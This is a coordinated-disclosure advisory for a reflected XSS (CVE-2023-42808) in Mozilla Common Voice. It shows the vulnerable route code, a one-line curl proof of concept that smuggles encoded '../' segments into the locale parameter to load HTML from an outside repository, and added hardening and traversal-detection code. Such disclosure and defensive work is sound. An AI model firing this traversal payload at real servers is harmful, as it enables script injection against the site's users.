CVE-2023-42808: GHSL-2023-026: Cross-site scripting (XSS) in Common Voice - CVE-2023-42808
Common Voice is the web app for Mozilla Common Voice, a platform for collecting speech donations in order to create public domain datasets for training voice recognition-related tools. Version 1.88.2 is vulnerable to reflected Cross-Site Scripting given that user-controlled data flows to a path expression (path of a network request). This issue may lead to reflected Cross-Site Scripting (XSS) in the context of Common Voice’s server origin. As of time of publication, it is unknown whether any patches or workarounds exist.
Coordinated Disclosure Timeline
- 2023-02-09: Report sent to [email protected]
- 2023-02-13: Report is acknowledged
- 2023-02-13: Mozilla security team suggests a fix
- 2023-02-13: Reporter agrees on the fix
- 2023-03-20: Security Lab asks for an update
- 2023-05-09: Security Lab asks for an update
- 2023-05-11: Deadline expires
Summary
Common Voice is vulnerable to Cross-Site Scripting (XSS).
Product
Common Voice
Tested Version
release-v1.88.2
Details
Issue: User-controlled data used in path expression in fetchLegalDocument (GHSL-2023-026)
Common Voice is vulnerable to reflected Cross-Site Scripting given that user-controlled data flows to a path expression (path of a network request).
// https://github.com/mozilla/common-voice/blob/9d6ffd755e29b81918b86b9f5218b9c27d9c1c1a/server/src/server.ts#L214
private setupPrivacyAndTermsRoutes() {
  this.app.get(
    '/privacy/:locale.html',
    async ({ params: { locale } }, response) => {
      response.send(await fetchLegalDocument('privacy_notice', locale));
    }
  );
setupPrivacyAndTermsRoutes takes locale from the route parameter and passes it unchanged to fetchLegalDocument.
// https://github.com/mozilla/common-voice/blob/9d6ffd755e29b81918b86b9f5218b9c27d9c1c1a/server/src/fetch-legal-document.ts#LL21-L62C2
export default async function fetchLegalDocument(
  name: string,
  locale: string
): Promise<string> {
  ...
  const legalLocale = localeMapping[locale] ?? locale;
  const [status, text] = await request({
    uri: `https://raw.githubusercontent.com/mozilla/legal-docs/master/${legalLocale}/common_voice_${name}.md`,
    resolveWithFullResponse: true,
  })
    .then((response: any) => [response.statusCode, response.body])
    .catch(response => [response.statusCode, null]);
  if (status >= 400 && status < 500) {
    ...
  } else if (status < 300) {
    textHTML = new commonmark.HtmlRenderer().render(
      new commonmark.Parser().parse(
        // There's a parseable datetime string in the legal documents, which we don't need to show
        (text as string).replace(/{:\sdatetime=".*" }/, '')
      )
    );
  }
  ...
  return textHTML;
}
fetchLegalDocument retrieves a file whose path includes the provided locale, allowing an attacker to supply ../ segments to traverse into another repository, such as ../../../jorgectf-testing/poc/main/poc.html#.
Proof of Concept
curl '127.0.0.1:9000/privacy/..%2f..%2f..%2fjorgectf-testing%2fpoc%2fmain%2fpoc.html%23.html'
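As an added example (not Common Voice's code), the following shows a hardened way to build the legal-document URL: an allowlist check on `locale` before it reaches the path, a post-normalisation check on the resolved path, and a log-review helper that flags traversal attempts against the `/privacy/:locale.html` route. `LOCALE_PATTERN`, the placeholder repository `example-org` and all function names are assumptions.

```typescript
// Added example, not Common Voice's code. Shows why raw interpolation of the
// route parameter is unsafe and how to validate it before building the URL.

const LEGAL_DOCS_BASE = 'https://raw.githubusercontent.com/mozilla/legal-docs/master/';

// Assumed allowlist: a language tag such as "en", "pt-BR" or "zh-Hant-TW".
// Any value containing "/", ".", "%" or "#" fails this pattern outright.
const LOCALE_PATTERN = /^[a-z]{2,3}(?:-[A-Za-z0-9]{2,8})*$/;

export function isSafeLocale(locale: string): boolean {
  return LOCALE_PATTERN.test(locale);
}

// Mirrors the vulnerable pattern: the parameter is placed into the URL as-is.
export function unsafeLegalDocUri(name: string, locale: string): string {
  return `${LEGAL_DOCS_BASE}${locale}/common_voice_${name}.md`;
}

// Path the remote host would actually see after "../" segments are resolved.
export function resolvedPath(uri: string): string {
  return new URL(uri).pathname;
}

// Hardened variant: reject unexpected locales, then verify (defence in depth)
// that the normalised path is still inside the legal-docs repository.
export function safeLegalDocUri(name: string, locale: string): string | null {
  if (!isSafeLocale(locale)) return null;
  const url = new URL(unsafeLegalDocUri(name, locale));
  if (!url.pathname.startsWith('/mozilla/legal-docs/master/')) return null;
  return url.toString();
}

// Log-review helper: decode the raw path segment up to twice (to catch
// double encoding) and flag any ".." path segment as a traversal attempt.
export function looksLikeTraversal(rawSegment: string): boolean {
  let decoded = rawSegment;
  for (let i = 0; i < 2; i++) {
    try {
      decoded = decodeURIComponent(decoded);
    } catch (_err) {
      break; // malformed percent-encoding; judge what was decoded so far
    }
  }
  return decoded.split(/[\\/]/).includes('..');
}
```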
Impact
This issue may lead to reflected Cross-Site Scripting (XSS) in the context of Common Voice’s server origin.
Resources
- CodeQL for JavaScript - Uncontrolled data used in path expression
- OWASP - Cross Site Scripting (XSS)
- CVE-2023-42808
Credit
This issue was discovered and reported by GHSL team member @jorgectf (Jorge Rosillo).
You can contact the GHSL team at [email protected]; please include a reference to GHSL-2023-026 in any communication regarding this issue.